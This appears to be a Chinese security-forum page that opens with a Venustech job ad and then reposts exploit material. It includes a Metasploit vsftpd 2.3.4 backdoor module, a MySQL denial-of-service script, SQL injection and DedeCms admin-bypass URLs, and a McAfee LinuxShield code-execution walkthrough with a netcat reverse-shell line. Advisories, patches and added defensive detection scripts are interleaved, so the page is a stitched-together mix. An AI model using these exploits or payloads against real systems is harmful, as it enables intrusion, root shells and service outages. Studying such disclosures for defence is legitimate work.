
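[Recruitment] [Hiring] Venustech (启明星辰) R&D recruitment

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Security assistant: Recruit or job-hunt through the 非安全中国 administrators, QQ group: 57116771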


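  • ++++++++++ Venustech notes ++++++++++

    Just send me a private message on this site.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Develop and maintain software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled with the Linux operating system; proficient in C programming on Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. Responsible for system testing and integration testing of products
    2. Responsible for writing, executing and revising product test cases
    3. Responsible for product performance testing
    4. Responsible for support and testing work on external projects

    Requirements:

    1. Basic knowledge of TCP/IP
    2. Solid data-communications fundamentals
    3. Some grounding in Linux
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test case design, system testing and stress testing
    7. Familiar with firewall principles and with some firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Deliver trojan detection services and web vulnerability scanning services
    2. Provide technical support to service customers
    3. Research web-page trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and similar topics
    4. Routinely upgrade and maintain the security event libraries of products such as IDS/IPS/UTM/TDS/WAG/322
    5. Research attack techniques, the TCP/IP protocol, and reverse engineering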

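    非安全中国网 disclaimer: 1. All statements and images in this post are solely the poster's personal opinion and do not represent the position of this site;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer Statement" and enjoys the related rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Parts of this post are reposted from other media and published on this site; the purpose of reposting is to pass on more information and does not mean this site agrees with the views expressed or takes responsibility for their accuracy;
    5. If this post infringes your site's or your personal copyright, please notify this site immediately; this site will delete it promptly and offers its sincere apologies;
    6. The administrators and moderators of this site may delete this post without notifying the poster in advance.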

    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

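A defender-side check for the backdoor that the module above targets, added here as an example (it is not part of the original post or of Metasploit): it flags FTP logins whose user name contains `:)` and looks for a listener on port 6200 in a `/proc/net/tcp` snapshot. The log line layout, the function names and all sample data are constructed assumptions.

```python
import re

BACKDOOR_PORT = 6200  # bind-shell port named in the module above

# Assumed log layout (vsftpd-style protocol logging); adapt the regex to your own logs.
USER_CMD = re.compile(r'Client "(?P<client>[^"]+)", "USER (?P<user>[^"]*)"')

# Constructed sample log lines (documentation addresses, not real hosts).
SAMPLE_LOG = [
    'Mon Jul  4 10:01:11 2011 [pid 2211] FTP command: Client "192.0.2.10", "USER anonymous"',
    'Mon Jul  4 10:02:40 2011 [pid 2230] FTP command: Client "198.51.100.7", "USER xK3:)"',
    'Mon Jul  4 10:02:40 2011 [pid 2230] FTP command: Client "198.51.100.7", "PASS <password>"',
    'Mon Jul  4 10:05:02 2011 [pid 2244] FTP command: Client "192.0.2.10", "USER backup"',
]

# Constructed /proc/net/tcp snapshot: ports 21 and 6200 listening, one established SSH session.
SAMPLE_PROC_NET_TCP = [
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode",
    "   0: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11001 1",
    "   1: 00000000:1838 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11002 1",
    "   2: 0A00020F:0016 0A000202:C350 01 00000000:00000000 02:000A0F1B 00000000     0        0 11003 1",
]


def trigger_logins(log_lines):
    """Return (client, user) pairs whose USER argument contains the ':)' sequence."""
    hits = []
    for line in log_lines:
        match = USER_CMD.search(line)
        if match and ":)" in match.group("user"):
            hits.append((match.group("client"), match.group("user")))
    return hits


def listening_ports(proc_net_tcp_lines):
    """Parse /proc/net/tcp text and return the TCP ports in LISTEN state (st == 0A).

    IPv6 listeners live in /proc/net/tcp6, which uses the same column layout.
    """
    ports = set()
    for line in proc_net_tcp_lines[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        local_address, state = fields[1], fields[3]
        if state == "0A":
            # local_address is HEXIP:HEXPORT; the port is the part after the last colon
            ports.add(int(local_address.rsplit(":", 1)[1], 16))
    return ports


def assess(log_lines, proc_net_tcp_lines):
    """Combine both indicators into one report for a single host."""
    return {
        "trigger_logins": trigger_logins(log_lines),
        "backdoor_listener": BACKDOOR_PORT in listening_ports(proc_net_tcp_lines),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_LOG, SAMPLE_PROC_NET_TCP))
```

On a live host, pass the lines of the FTP log and of `/proc/net/tcp` instead of the samples; either indicator on a host running vsftpd 2.3.4 is a reason to verify the installed binary against a known-good build.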

    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability
    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 Remote Denial of Service Vulnerability

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")

    buf2=("x11x00x00x00x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()


    Step-by-step guide to installing Linux: setting up the virtual machine
    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability
    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug in the URL above to the current verification code and you can enter the site's admin backend directly.

    This vulnerability can only be used if the admin backend path is already known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
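Why the replacement filter in the DedeCms post above matters, shown as an added example (a Python model of the two PHP snippets, not DedeCms code): PHP turns a parameter named `_POST[GLOBALS][cfg_dbhost]` into nested arrays under the top-level key `_POST`, so a check of top-level keys only never sees `GLOBALS` or `cfg_dbhost`. The function names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

BLOCKED = re.compile(r"^(cfg_|GLOBALS)")  # same pattern as both PHP snippets


def php_request(query):
    """Model how PHP fills $_REQUEST: 'a[b][c]=v' becomes {'a': {'b': {'c': 'v'}}}.

    Simplified: an empty '[]' index is stored under the key '' instead of being appended.
    """
    request = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split("[", 1)[0]
        keys = [base] + re.findall(r"\[([^\]]*)\]", name[len(base):])
        node = request
        for key in keys[:-1]:
            if not isinstance(node.get(key), dict):
                node[key] = {}
            node = node[key]
        node[keys[-1]] = value
    return request


def old_filter_blocks(request):
    """Original check: only the top-level keys of $_REQUEST are tested."""
    return any(len(key) > 0 and bool(BLOCKED.match(key)) for key in request)


def new_filter_blocks(val):
    """Replacement CheckRequest: recurse into arrays, testing every key and every scalar value."""
    if isinstance(val, dict):
        return any(new_filter_blocks(k) or new_filter_blocks(v) for k, v in val.items())
    return len(val) > 0 and bool(BLOCKED.match(val))


def compare(query):
    """Return (blocked_by_old, blocked_by_new) for one query string."""
    request = php_request(query)
    return old_filter_blocks(request), new_filter_blocks(request)


# Constructed query strings; the host name is a placeholder.
NESTED = "dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=db.example.invalid"
TOP_LEVEL = "cfg_dbhost=db.example.invalid"
BENIGN = "dopost=login&userid=admin&tags[]=news"
VALUE_ONLY = "note=cfg_style"

if __name__ == "__main__":
    for label, query in [("nested", NESTED), ("top-level", TOP_LEVEL),
                         ("benign", BENIGN), ("value only", VALUE_ONLY)]:
        print(label, compare(query))
```

The last case shows a side effect of the replacement: because scalar values are tested too, a harmless value that merely starts with `cfg_` or `GLOBALS` is rejected as well.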

    Step-by-step guide to installing Linux: setting up the virtual machine tools
    http://www.sitedir.com.cn/video/8.swf

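    Multiple security vulnerabilities in the Django development framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks or cause denial of service.
    1) When a cache backend is used, django.contrib.sessions handles sessions incorrectly, which can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, that validates whether a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify the supplied URL by resolving it. By default the underlying socket has no timeout, so an attacker can send specially crafted URLs to consume all server memory, causing denial of service.
    3) An error in handling redirect responses when validating URLs supplied to the "URLField" field type lets an attacker have a redirect response point to a "file://" URL and so determine whether local files exist on the server.
    4) An error in handling the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses lets an attacker carry out cache poisoning attacks.

    Details:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/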

    McAfee LinuxShield Local/Remote Code Execution Vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed
    - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield web interface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do
    configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and
    execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    xmlns:ns="naSiteLi
    st" GlobalVersion="20030131003110"
    LocalVersion="20091209
    161903" Type="Client"><SiteList
    Default="1" Name="SomeGU
    ID"><HttpSite Type="repository"
    Name="EvilRepo" Order="1
    " Server="<attackerhost>:80"
    Enabled="1" Local="1"><Rela
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    rName></
    UserName><Password
    Encrypted="0"/></HttpSite></SiteList></
    ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
    2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
    the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
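A configuration audit for the LinuxShield issue described in the advisory above, added here as an example (not McAfee's tooling and not part of the advisory): it flags scan profiles whose `scannerPath`, `enginePath` or `engineLibDir` resolves outside the install prefix or inside the update download directory. The `key=value` / `key: value` input layout, the trusted prefix, the function name and the sample profile values are assumptions constructed for illustration.

```python
import posixpath
import re

# Install prefix taken from the engine paths shown in the advisory; treated as trusted (assumption).
TRUSTED_PREFIX = "/opt/NAI/LinuxShield/"
# Directory the advisory names as the location of downloaded update files.
UPDATE_SCRATCH = "/opt/McAfee/cma/scratch/"
# Profile settings that name code to be loaded or executed.
PATH_KEYS = ("scannerPath", "enginePath", "engineLibDir")

# Matches 'nailsd.profile.<profile>.<key>=<value>' or '...: <value>' anywhere in the text,
# so it works on one-setting-per-line files and on flattened 'sconf ... set' strings.
SETTING = re.compile(
    r"nailsd\.profile\.(?P<profile>[^.\s]+)\.(?P<key>[\w.]+)\s*[:=]\s*(?P<value>\S+)"
)

# Constructed sample settings; the ODS_1 scanner path is a made-up benign value.
SAMPLE_CONFIG = """\
nailsd.profile.ODS_1.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_1.engineLibDir=/opt/NAI/LinuxShield/engine/lib
nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/libexec/scanner
nailsd.profile.ODS_1.quarantineDirectory=/quarantine
nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
nailsd.profile.ODS_7.scannerPath: /opt/NAI/LinuxShield/../../../tmp/x
"""


def audit_profiles(config_text):
    """Return (profile, key, normalized_path, reason) for every suspicious path setting."""
    findings = []
    for match in SETTING.finditer(config_text):
        key = match.group("key")
        if key not in PATH_KEYS:
            continue
        # Normalize first so '..' segments cannot hide a path outside the prefix.
        path = posixpath.normpath(match.group("value"))
        probe = path + "/"  # lets a directory value equal to the prefix itself pass
        if probe.startswith(UPDATE_SCRATCH):
            reason = "inside update scratch directory"
        elif not probe.startswith(TRUSTED_PREFIX):
            reason = "outside trusted prefix"
        else:
            continue
        findings.append((match.group("profile"), key, path, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_profiles(SAMPLE_CONFIG):
        print(finding)
```

Run it against the contents of the scan-profile file the advisory names (`/var/opt/NAI/LinuxShield/etc/ods.cfg`) after adjusting the pattern to that file's actual layout.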